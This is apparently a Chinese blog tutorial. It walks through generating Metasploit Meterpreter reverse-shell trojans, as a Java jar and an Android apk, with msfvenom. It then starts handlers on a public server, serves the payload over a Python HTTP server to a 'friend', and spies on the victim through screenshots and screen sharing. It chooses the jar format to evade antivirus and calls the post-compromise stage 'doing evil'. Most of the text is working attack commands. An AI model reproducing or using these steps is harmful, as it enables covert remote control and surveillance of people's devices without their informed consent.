这个就有点类似于拿到命令执行漏洞,在对方机器上反弹shell一样。
此处为给朋友做演示,直接给他发一个马让他执行,来看看我们可以做什么。
首先需要一台公网服务器。(憋问为什么
1.生成木马
1.1电脑
为防止exe文件被杀软杀掉,我们生成一个jar的马。(前提是对方机器有java环境
LHOST中填写你的公网IP,LPORT填写端口(随意哪个,不要80
msfvenom -p java/meterpreter/reverse_tcp LHOST=xx.xx.xx.xx LPORT=2121 W>a.jar
1.2安卓手机
同理,命令换成
msfvenom -p android/meterpreter/reverse_tcp LHOST=xx.xx.xx.xx LPORT=2121 R > a.apk
2.开启监听
好了,此时我们先去开启监听。(不监听你怎么知道他连上了?
首先打开你的msf。kali下输入命令msfconsole。
2.1 电脑
然后开启监听:(-H后为你的公网IP
handler -p java/meterpreter/reverse_tcp -H xx.xx.xx.xx -P 2121
2.2手机
监听命令换为
handler -p android/meterpreter/reverse_tcp -H xx.xx.xx.xx -P 2121
3.发送并执行木马
将上一步生成好的木马之后发给你的朋友,或者直接让他下下来,利用python快速开启一个http服务。(8080为指定端口,你指定其他也可以
python -m SimpleHTTPServer 8080
3.1电脑
然后把地址发给对方。http://xx.xx.xx.xx:8080/a.jar
并让对方执行。
在他执行的一瞬间,你就看到这边已经弹回来了。
查看sessions
sessions
进入会话(序号是几就按几
sessions 1
3.2 手机
让对方安装apk就好了。
4.为非作歹
接下来,当然就是为非作歹的时候了。
行首先截个屏看看干啥呢。
screenshot
截图文件就在这个路径下,可自行查看。
screenshare:远程监控
5.无聊时间
还有很多能做的事情,输入help,可自行查看。
(太懒不列举了